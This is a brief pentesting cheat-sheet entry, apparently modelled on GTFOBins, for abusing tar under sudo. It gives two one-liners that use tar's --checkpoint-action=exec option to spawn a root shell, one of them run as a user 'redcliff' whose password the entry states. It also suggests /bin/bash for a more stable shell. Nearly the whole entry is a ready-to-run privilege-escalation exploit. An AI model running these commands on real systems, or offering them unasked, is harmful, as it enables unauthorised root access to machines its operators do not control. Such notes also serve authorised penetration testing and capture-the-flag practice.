tar

#Sudo one liner to escalate privileges, other functionalities also available

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

#Authenticated variant , password redcliff

sudo -u redcliff tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

# ....  exec=/bin/bash for a more stable shell

Last updated